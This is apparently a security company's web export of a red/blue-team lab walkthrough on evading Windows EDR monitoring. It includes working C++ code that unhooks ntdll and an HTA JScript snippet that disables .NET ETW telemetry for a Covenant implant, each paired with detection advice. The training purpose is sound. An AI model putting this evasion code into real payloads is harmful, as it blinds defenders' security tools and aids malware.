{"id":10523,"date":"2021-04-07T09:00:00","date_gmt":"2021-04-07T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/"},"modified":"2026-05-25T10:20:51","modified_gmt":"2026-05-25T09:20:51","slug":"attack-detection-fundamentals-2021-windows-lab-2","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/","title":{"rendered":"Attack Detection Fundamentals 2021: Windows &#8211; Lab #2"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals 2021: Windows &#8211; <span class=\"blue-text\">Lab #2<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n     
                                   Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                07 4\u6708, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    \u30b7\u30a7\u30a2\u3059\u308b                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    
10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Alfie Champion<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                \u30b3\u30f3\u30c6\u30f3\u30c4\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3            <\/span>\n            <select 
         <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Fundamentals workshop series for 2021, we covered advanced defense evasion and credential access techniques targeting Windows endpoints.  
This included the offensive and defensive use of API hooking, as well as the theft of cookies to enable &#x27;session hijacking&#x27;.<\/p>\n<p>A recording of the first workshop can be found <a href=\"https:\/\/www.youtube.com\/watch?v=h1OBjMx-R-M\" target=\"_blank\" rel=\"noopener\">here<\/a> and the slides are available <a href=\"https:\/\/www.f-secure.com\/content\/dam\/f-secure\/en\/consulting\/events\/collaterals\/digital\/f-secure_attack-detection-fundamentals-workshop-1-windows_2021-04-07.pdf\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-1\/\" target=\"_blank\" rel=\"noopener\">previous lab<\/a>, we started developing an initial access payload that would ultimately execute a <a href=\"https:\/\/github.com\/cobbr\/Covenant\" target=\"_blank\" rel=\"noopener\">Covenant<\/a> Grunt on the target host. Initially we saw how AMSI would detect and block our shellcode on launch, and we took steps to evade that using The Wover and Odzhan&#x27;s <a href=\"https:\/\/github.com\/TheWover\/\" target=\"_blank\" rel=\"noopener\">Donut<\/a> project. 
From there we packaged our shellcode into a Dynamic Link Library (DLL), before packaging that into an HTA file, more likely to be permitted through a web or mail filter (and more likely to run when a target user clicks on it!).<\/p>\n<p>Along the way we saw plenty of detection opportunities including:<\/p>\n<ul>\n<li>The initial AMSI block event from Windows Defender.<\/li>\n<li>Our many opsec fails highlighted by FireEye&#x27;s <a href=\"https:\/\/github.com\/fireeye\/capa\" target=\"_blank\" rel=\"noopener\">CAPA<\/a> tool.<\/li>\n<li>Our use of the ever-green CreateRemoteThread API call.<\/li>\n<li>Web or mail filtering logs showing our HTA file being delivered to the target endpoint.<\/li>\n<li>The anomalous DLL load performed by Mshta.exe from the %APPDATA% directory.<\/li>\n<\/ul>\n<p>In this lab, we&#x27;ll continue to refine our payload, introducing other defense evasion techniques to unhook potentially EDR-monitored API functions, and patch ETW to ensure our subsequent activities aren&#x27;t seen by security tools that rely on this telemetry source for their detections.<\/p>\n<p>Let&#x27;s get started.<\/p>\n<h2>Required Tools<\/h2>\n<ul>\n<li>1x Windows VM (ideally running <a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a>, SwiftOnSecurity&#x27;s <a href=\"https:\/\/raw.githubusercontent.com\/SwiftOnSecurity\/sysmon-config\/master\/sysmonconfig-export.xml\" target=\"_blank\" rel=\"noopener\">config<\/a> will do)<\/li>\n<li>1x Kali VM (Optional)<\/li>\n<li>Covenant<\/li>\n<li>Visual Studio 2019 Community Edition<\/li>\n<li><a href=\"https:\/\/github.com\/fireeye\/SilkETW\" target=\"_blank\" rel=\"noopener\">SilkETW<\/a><\/li>\n<li><a href=\"https:\/\/frida.re\/docs\/installation\/\" target=\"_blank\" rel=\"noopener\">Frida for Windows<\/a><\/li>\n<\/ul>\n<p>DISCLAIMER: Set up of the tools and the testing environment is not covered comprehensively within this lab. Everything below should be run inside isolated, disposable lab VMs: the payload deliberately removes security hooks and suppresses telemetry, and must never be executed on a production or personal machine. 
We will assume basic familiarity with Windows command line and the ability of the reader to build the necessary tools.<\/p>\n<h2>Walkthrough<\/h2>\n<h3>API Hooking<\/h3>\n<p>Our existing payload could work against basic AV software, however, modern EDRs will have a lot of other automated detection mechanisms and sensors available to spot this type of malicious activity. One of those mechanisms we can target is &quot;API Hooking&quot;. As discussed in the workshop, API hooking is a technique used to hijack the execution flow of a normal API call. It has been used for a variety of reasons, but has been popularised in AV\/EDRs since it allows the detection engine to inspect which APIs are used by the inspected processes and take decisions based on some underlying logic, even outright preventing activity it deems to be malicious.<\/p>\n<p>For example, the function we used to trigger our shellcode is CreateRemoteThread. This function, despite being used legitimately by software, is also heavily abused by malware. EDRs will perform API hooking in order to monitor its usage and the arguments passed to it. 
The logic with which a product decides whether an API call is malicious or not can depend on many factors, a few examples:<\/p>\n<ul>\n<li>If the thread is called on an address that is not backed by an image on disk; this could be a sign that the memory was allocated with malicious intent.<\/li>\n<li>If the memory protection of the memory pages where the new thread is started is Read Write and Execute (RWX), it could be a sign of malicious activity.<\/li>\n<\/ul>\n<p>Of course, this is an over-simplification of the decision process that a security product can make, but open-source memory scanners, such as <a href=\"https:\/\/github.com\/hasherezade\/pe-sieve\" target=\"_blank\" rel=\"noopener\">Pe-Sieve<\/a>, <a href=\"https:\/\/github.com\/forrest-orr\/moneta\" target=\"_blank\" rel=\"noopener\">Moneta<\/a>, Volatility&#x27;s <a href=\"https:\/\/github.com\/volatilityfoundation\/volatility\/wiki\/Command-Reference-Mal#malfind\" target=\"_blank\" rel=\"noopener\">malfind<\/a> or <a href=\"https:\/\/gist.github.com\/jaredcatkinson\/23905d34537ce4b5b1818c3e6405c1d2\" target=\"_blank\" rel=\"noopener\">Get-InjectedThreads<\/a> contain enough information to clarify this process.<\/p>\n<p>Since we won&#x27;t use commercial products or real EDRs for this demo, we will perform API hooking using the popular open source framework Frida. With Frida it is possible to intercept API calls in a similar way to a commercial EDR.<\/p>\n<p>Before executing Frida, it is necessary to place an &#x27;alert()&#x27; in our HTA, this will give us time to attach Frida to the &#x27;mshta&#x27; process and inspect the functions.<\/p>\n<p>After placing the &#x27;alert&#x27; function, we can execute our HTA.<\/p>\n<p>We then need to find the PID of our HTA process, this can be done using Task Manager or any other means. 
The Frida command to execute will look like the following:<\/p>\n<pre><code class=\"language-bash\">frida-trace.exe -p 7280 -i NtCreateThreadEx<\/code><\/pre>\n<p>Where &#x27;-p&#x27; will indicate the PID of mshta and &#x27;-i&#x27; will be the function we want to intercept. We chose &#x27;NtCreateThreadEx&#x27; since it&#x27;s the underlying function within &#x27;ntdll&#x27; used by &#x27;CreateRemoteThread&#x27; and usually EDRs tend to put their hook in &#x27;ntdll&#x27; rather than a higher level library.<\/p>\n<p>Clicking &quot;OK&quot; on the alert box within our HTA will allow the script to continue and we should see the following:<\/p>\n<pre><code class=\"language-bash\">PS C:\\Users\\Developer\\Desktop\\workshop&gt; frida-trace.exe -p 7280 -i NtCreateThreadEx\nInstrumenting...\nNtCreateThreadEx: Auto-generated handler at &quot;C:\\\\Users\\\\Developer\\\\Desktop\\\\workshop\\\\__handlers__\\\\ntdll.dll\\\\NtCreateThreadEx.js&quot;\nStarted tracing 1 function. Press Ctrl+C to stop.\n\/* TID 0x25f8 *\/\n6281 ms NtCreateThreadEx()<\/code><\/pre>\n<p>This means that Frida was able to intercept and inspect our API call. We haven&#x27;t implemented any subsequent detection logic here, but an EDR would probably have stopped this action from happening.<\/p>\n<p>A technique quite popular amongst malware authors and red teamers is to remove the hooks from the intercepted functions. This would remove (at least partially) the ability of the EDR to receive telemetry about the API usage. Sometimes, removing API hooks is sufficient to circumvent preventive controls. One of the first publicly documented examples of this in the red teaming world comes from MDSec&#x27;s <a href=\"https:\/\/www.mdsec.co.uk\/2019\/03\/silencing-cylance-a-case-study-in-modern-edrs\/\" target=\"_blank\" rel=\"noopener\">Silencing Cylance<\/a> blog post.<\/p>\n<p>One way in which hooks can be removed from a library, is to replace its code with the one fetched directly from the on-disk DLL. 
This approach works because an EDR only modifies the in-memory image of the DLL, not the file on disk. Couple this with the fact that a process has full control over its own memory space and we can remove the installed hooks.<\/p>\n<p>Cylance itself published interesting <a href=\"https:\/\/blogs.blackberry.com\/en\/2017\/02\/universal-unhooking-blinding-security-software\" target=\"_blank\" rel=\"noopener\">research<\/a> on the topic, where they demonstrate how the concept above can be implemented programmatically. The code below is taken from ired.team&#x27;s <a href=\"https:\/\/www.ired.team\/offensive-security\/defense-evasion\/how-to-unhook-a-dll-using-c++\" target=\"_blank\" rel=\"noopener\">&#x27;Full DLL Unhooking in C++&#x27;<\/a>:<\/p>\n<pre><code class=\"language-cpp\">\/\/ Unhook ntdll.dll\nHANDLE process = GetCurrentProcess();\nMODULEINFO mi = {};\nHMODULE ntdllModule = GetModuleHandleA(&quot;ntdll.dll&quot;);\n\nGetModuleInformation(process, ntdllModule, &amp;mi, sizeof(mi));\nLPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;\nHANDLE ntdllFile = CreateFileA(&quot;c:\\\\windows\\\\system32\\\\ntdll.dll&quot;, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);\nHANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);\nLPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);\n\nPIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;\nPIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader-&gt;e_lfanew);\n\nfor (WORD i = 0; i &lt; hookedNtHeader-&gt;FileHeader.NumberOfSections; i++) {\nPIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));\nif (!strcmp((char*)hookedSectionHeader-&gt;Name, (char*)&quot;.text&quot;)) {\nDWORD oldProtection = 0;\nbool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + 
(DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), hookedSectionHeader-&gt;Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &amp;oldProtection);\nmemcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), hookedSectionHeader-&gt;Misc.VirtualSize);\nisProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader-&gt;VirtualAddress), hookedSectionHeader-&gt;Misc.VirtualSize, oldProtection, &amp;oldProtection);\n}\n}\n\nCloseHandle(process);\nCloseHandle(ntdllFile);\nCloseHandle(ntdllMapping);\nFreeLibrary(ntdllModule);<\/code><\/pre>\n<p>The code above overwrites the whole .text section of the loaded ntdll with the clean copy, removing every userland hook in it; this can be verified by running Frida again, and you will see that this time no function is intercepted. A few things are worth noting about this snippet, both for opsec and for detection. It opens and maps a second, read-only image view of the on-disk ntdll.dll, a DLL the process has already loaded, and never releases that view (there is no matching UnmapViewOfFile call), so the extra mapping stays in the process address space for as long as the process lives. It temporarily flips ntdll&#x27;s image-backed code pages to PAGE_EXECUTE_READWRITE, exactly the kind of protection change mentioned earlier as a detection heuristic, and it checks none of the VirtualProtect return values, so a refused protection change would lead straight to a faulting memcpy. (CloseHandle on the GetCurrentProcess pseudo-handle is harmless, but FreeLibrary on a handle obtained from GetModuleHandleA, which does not take a reference, is unbalanced.) Aside from a security product detecting the unhooking itself, the repeated open and image mapping of ntdll.dll and the RWX transition on its code pages can each be a detection opportunity in their own right.<\/p>\n<h3>ETW Bypassing<\/h3>\n<p>We mentioned how EDRs might use telemetry sources other than standard API hooking; one of these is Event Tracing for Windows, or ETW. Whilst designed for monitoring and troubleshooting purposes, ETW is used by defenders to track abuse of .NET and many other attacks, as described in WithSecure&#x27;s <a href=\"https:\/\/blog.f-secure.com\/detecting-malicious-use-of-net-part-2\/\" target=\"_blank\" rel=\"noopener\">&#x27;Detecting Malicious Use of .NET&#x27;<\/a>.<\/p>\n<p>We will not discuss ETW internals; the fundamental concept is that applications can subscribe to ETW providers and receive events. Events can be generated either by the Windows kernel or by an application itself. 
FireEye&#x27;s <a href=\"https:\/\/www.fireeye.com\/blog\/threat-research\/2019\/03\/silketw-because-free-telemetry-is-free.html\" target=\"_blank\" rel=\"noopener\">&#x27;SilkETW: Because Free Telemetry is \u2026 Free!&#x27;<\/a> showed how the &#x27;Microsoft-Windows-DotNETRuntime&#x27; provider can be used to detect .NET abuse.<\/p>\n<p>Let&#x27;s download SilkETW, FireEye&#x27;s ETW collector tool, and run it with the following options (the &#x27;-uk&#x27; keyword mask 0x2038 selects the loader, JIT and interop keywords of the provider, which produce the event types listed below):<\/p>\n<pre><code class=\"language-bash\">.\\SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -ot file -p C:\\windows\\temp\\etw.json<\/code><\/pre>\n<p>Launch the HTA attack again, and we should see a considerable number of events generated. Try also executing some post-exploitation commands from the Grunt to generate even more telemetry. You will notice that the number of events grows quickly as you spawn a Covenant implant and execute some commands.<\/p>\n<p>We will not dig deep into the types of events generated by the .NET ETW provider, but at a high level we can have telemetry for:<\/p>\n<ul>\n<li>Assembly Load events.<\/li>\n<li>P\/Invoke invocation (Win32 APIs).<\/li>\n<li>JIT compilation of methods.<\/li>\n<\/ul>\n<p>All these events can give useful information to defenders. 
An example of these could be an Assembly Load event such as the one below:<\/p>\n<pre><code class=\"language-json\">{\n&quot;ProviderGuid&quot;: &quot;e13c0d23-ccbc-4e12-931b-d9cc2eee27e4&quot;,\n&quot;YaraMatch&quot;: [],\n&quot;ProviderName&quot;: &quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;EventName&quot;: &quot;Loader\/AssemblyLoad&quot;,\n&quot;Opcode&quot;: 37,\n&quot;OpcodeName&quot;: &quot;AssemblyLoad&quot;,\n&quot;TimeStamp&quot;: &quot;2021-03-26T13:24:13.5921269-07:00&quot;,\n&quot;ThreadID&quot;: 4024,\n&quot;ProcessID&quot;: 7164,\n&quot;ProcessName&quot;: &quot;notepad&quot;,\n&quot;PointerSize&quot;: 4,\n&quot;EventDataLength&quot;: 166,\n&quot;XmlEventData&quot;: {\n&quot;FormattedMessage&quot;: &quot;AssemblyID=46,911,120;\\r\\nAppDomainID=46,825,120;\\r\\nAssemblyFlags=0;\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=rywvgj1k.0jo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null &quot;,\n&quot;ProviderName&quot;: &quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;ClrInstanceID&quot;: &quot;25&quot;,\n&quot;AppDomainID&quot;: &quot;46,825,120&quot;,\n&quot;BindingID&quot;: &quot;0&quot;,\n&quot;MSec&quot;: &quot;34563.0716&quot;,\n&quot;AssemblyID&quot;: &quot;46,911,120&quot;,\n&quot;PID&quot;: &quot;7164&quot;,\n&quot;TID&quot;: &quot;4024&quot;,\n&quot;AssemblyFlags&quot;: &quot;0&quot;,\n&quot;PName&quot;: &quot;&quot;,\n&quot;FullyQualifiedAssemblyName&quot;: &quot;rywvgj1k.0jo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null&quot;,\n&quot;EventName&quot;: &quot;Loader\/AssemblyLoad&quot;\n}\n}<\/code><\/pre>\n<p>BLUE TEAM ALERT: Whilst at a glance this looks legitimate, look at the structured field &#x27;FullyQualifiedAssemblyName&#x27;: it is &#x27;rywvgj1k.0jo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null&#x27;, a random-looking name with no version information and no strong-name key. (The &#x27;FormattedMessage&#x27; text in this sample has its labels shifted by one because it omits BindingID, and so appears to attribute that value to &#x27;ClrInstanceID&#x27;; the parsed field shows &#x27;ClrInstanceID&#x27; is actually &#x27;25&#x27;. Key detection logic on the structured fields, not on the formatted text.) The process name is a second red flag: notepad.exe is a native application with no ordinary reason to host the CLR, so any Microsoft-Windows-DotNETRuntime event attributed to it deserves attention. 
If you inspect similar events from genuine .NET processes, you will notice that the assemblies they load carry meaningful names and real version numbers, unlike the one above.<\/p>\n<p>As another example, the Covenant &#x27;DCOMCommand&#x27; task was executed locally; below is one of the events generated as a result:<\/p>\n<pre><code class=\"language-json\">{\n&quot;ProviderGuid&quot;:&quot;e13c0d23-ccbc-4e12-931b-d9cc2eee27e4&quot;,\n&quot;YaraMatch&quot;:[],\n&quot;ProviderName&quot;:&quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;EventName&quot;:&quot;Method\/LoadVerbose&quot;,\n&quot;Opcode&quot;:37,\n&quot;OpcodeName&quot;:&quot;LoadVerbose&quot;,\n&quot;TimeStamp&quot;:&quot;2021-03-26T13:24:48.468346-07:00&quot;,\n&quot;ThreadID&quot;:7424,\n&quot;ProcessID&quot;:7164,\n&quot;ProcessName&quot;:&quot;notepad&quot;,\n&quot;PointerSize&quot;:4,\n&quot;EventDataLength&quot;:280,\n&quot;XmlEventData&quot;:{\n&quot;ModuleID&quot;:&quot;1,790,447,616&quot;,\n&quot;PID&quot;:&quot;7164&quot;,\n&quot;ClrInstanceID&quot;:&quot;25&quot;,\n&quot;MethodSignature&quot;:&quot;instance void ()&quot;,\n&quot;MethodID&quot;:&quot;184,619,272&quot;,\n&quot;MethodFlags&quot;:&quot;Generic|Jitted&quot;,\n&quot;MethodToken&quot;:&quot;100,677,914&quot;,\n&quot;FormattedMessage&quot;:&quot;MethodID=184,619,272;\\r\\nModuleID=1,790,447,616;\\r\\nMethodStartAddress=179,606,592;\\r\\nMethodSize=11;\\r\\nMethodToken=100,677,914;\\r\\nMethodFlags=Generic|Jitted;\\r\\nMethodNamespace=System.Collections.Generic.Dictionary&#x27;2[SharpSploit.LateralMovement.DCOM+DCOMMethod,System.Guid];\\r\\nMethodName=.ctor;\\r\\nMethodSignature=instance void ();\\r\\nClrInstanceID=25 
&quot;,\n&quot;MSec&quot;:&quot;69439.2907&quot;,\n&quot;MethodNamespace&quot;:&quot;System.Collections.Generic.Dictionary&#x27;2[SharpSploit.LateralMovement.DCOM+DCOMMethod,System.Guid]&quot;,\n&quot;MethodStartAddress&quot;:&quot;179,606,592&quot;,\n&quot;TID&quot;:&quot;7424&quot;,\n&quot;MethodSize&quot;:&quot;11&quot;,\n&quot;ProviderName&quot;:&quot;Microsoft-Windows-DotNETRuntime&quot;,\n&quot;PName&quot;:&quot;&quot;,\n&quot;MethodName&quot;:&quot;.ctor&quot;,\n&quot;EventName&quot;:&quot;Method\/LoadVerbose&quot;\n}\n}<\/code><\/pre>\n<p>We can see some familiar keywords such as &#x27;SharpSploit&#x27;. <a href=\"https:\/\/github.com\/cobbr\/SharpSploit\" target=\"_blank\" rel=\"noopener\">SharpSploit<\/a> is a C# library heavily used within Covenant and therefore it makes sense to see references to it. The &#x27;MethodNamespace&#x27; value here, SharpSploit.LateralMovement.DCOM+DCOMMethod, is exactly the kind of string a defender can key a detection rule on.<\/p>\n<p>From an attacker&#x27;s perspective, this is not optimal, as we would like to minimise our footprint and detection opportunities. Interestingly, .NET related events are generated by the process itself, notepad in this case, and not by the kernel. What this means, similarly to API hooking, is that since we have full control over our own process we can simply manipulate it to stop generating those events. This was initially discovered by Adam Chester in his blog, <a href=\"https:\/\/blog.xpnsec.com\/hiding-your-dotnet-etw\/\" target=\"_blank\" rel=\"noopener\">&#x27;Hiding your .NET &#8211; ETW&#x27;<\/a>.<\/p>\n<p>There are two commonly known ways in which we could hide our activity from .NET ETW:<\/p>\n<ul>\n<li>We can patch the EtwEventWrite function within ntdll. Doing so, the process will not emit ETW events, but this requires patching memory from within our DLL, which, like the unhooking above, modifies ntdll&#x27;s code in memory and can be looked for in the same way; depending on the situation this might not be desirable (i.e. 
we might have already produced incriminating ETW events prior to us being able to disable it).<\/li>\n<li>By modifying the environment variable &#x27;COMPlus_EtwEnabled&#x27; and setting it to 0, as discovered again by Adam Chester in his <a href=\"https:\/\/blog.xpnsec.com\/hiding-your-dotnet-complus-etwenabled\/\" target=\"_blank\" rel=\"noopener\">&#x27;Hiding your .NET &#8211; COMPlus_ETWEnabled&#x27;<\/a> blog, we disable .NET ETW events in all the child processes created by the process that sets the variable; the setting process itself is unaffected. (Windows environment variable names are case-insensitive, so the differing capitalisation between the blog title and the snippet below does not matter.)<\/li>\n<\/ul>\n<p>Considering our scenario, it would make sense to set the aforementioned environment variable from within the HTA, since we will spawn a notepad process that will host our Grunt. To accomplish this, we can create a &#x27;WScript.Shell&#x27; object and access its &#x27;Environment&#x27; member (the &#x27;Process&#x27; target sets the variable in mshta&#x27;s own environment block, which the notepad child then inherits):<\/p>\n<pre><code class=\"language-javascript\">var shell = new ActiveXObject(&#x27;WScript.Shell&#x27;);\nshell.Environment(&#x27;Process&#x27;)(&#x27;COMPLUS_ETWEnabled&#x27;) = 0;<\/code><\/pre>\n<p>If we try to execute the same HTA after adding the code above, we will not see any event being generated by the notepad-hosted Grunt. Note that this hides nothing from a defender who inspects the environment of .NET processes: the variable can be seen there, and its presence in a process that has no reason to carry it is itself worth alerting on.<\/p>\n<h2>Conclusions<\/h2>\n<p>Across this two-part guide, we touched upon many concepts that could be used by defenders to assess their posture and stress their endpoint security solutions. It is by no means a comprehensive reference, nor the most advanced attack, but shows some of the defence evasion techniques that we commonly see in malware. 
The concepts covered included:<\/p>\n<ul>\n<li>AMSI blocking, and bypassing with Donut.<\/li>\n<li>Static Analysis with FireEye&#x27;s CAPA.<\/li>\n<li>Creation of a process injection DLL using the CreateRemoteThread API function (and it being detected with Sysmon!).<\/li>\n<li>Embedding of our DLL into an HTA file which decodes and drops this to disk (MSHTA dropping DLLs to %APPDATA%?!).<\/li>\n<li>Loading of our DLL using Registration Free COM.<\/li>\n<li>API unhooking to bypass any userland hooks that might interfere with our execution.<\/li>\n<li>ETW patching using environment variables to impair security products that rely on ETW for functionality.<\/li>\n<\/ul>\n<p>There are many improvements that can be done to further harden our payload, but that is left as an exercise for the reader. Examples of things that could and should be implemented:<\/p>\n<ul>\n<li>Encryption for strings.<\/li>\n<li>Sandbox detection.<\/li>\n<li>Execution guardrails for limiting the scope of our payload.<\/li>\n<\/ul>\n<p>Join us for the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noopener\">next lab<\/a> where we take the principle of API hooking and apply it in an offensive context; hooking functions as a user authenticates over RDP to retrieve their plaintext credentials!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials 
                       <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>In this lab, we&#8217;ll continue to refine our payload, introducing other defense evasion techniques to unhook potentially EDR-monitored API functions, and patch ETW to ensure our subsequent activities aren&#8217;t seen by security tools that rely on this telemetry source for their detections.<\/p>\n","protected":false},"author":3,"featured_media":0,"template":"","categories":[314,332,315],"labs_content_type":[317],"class_list":["post-10523","lab_item","type-lab_item","status-publish","hentry","category-attack-detection","category-endpoint-security","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder.jpg 618w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-300x214.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-447x318.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/placeholder-205x146.jpg 205w\" sizes=\"auto, (max-width: 
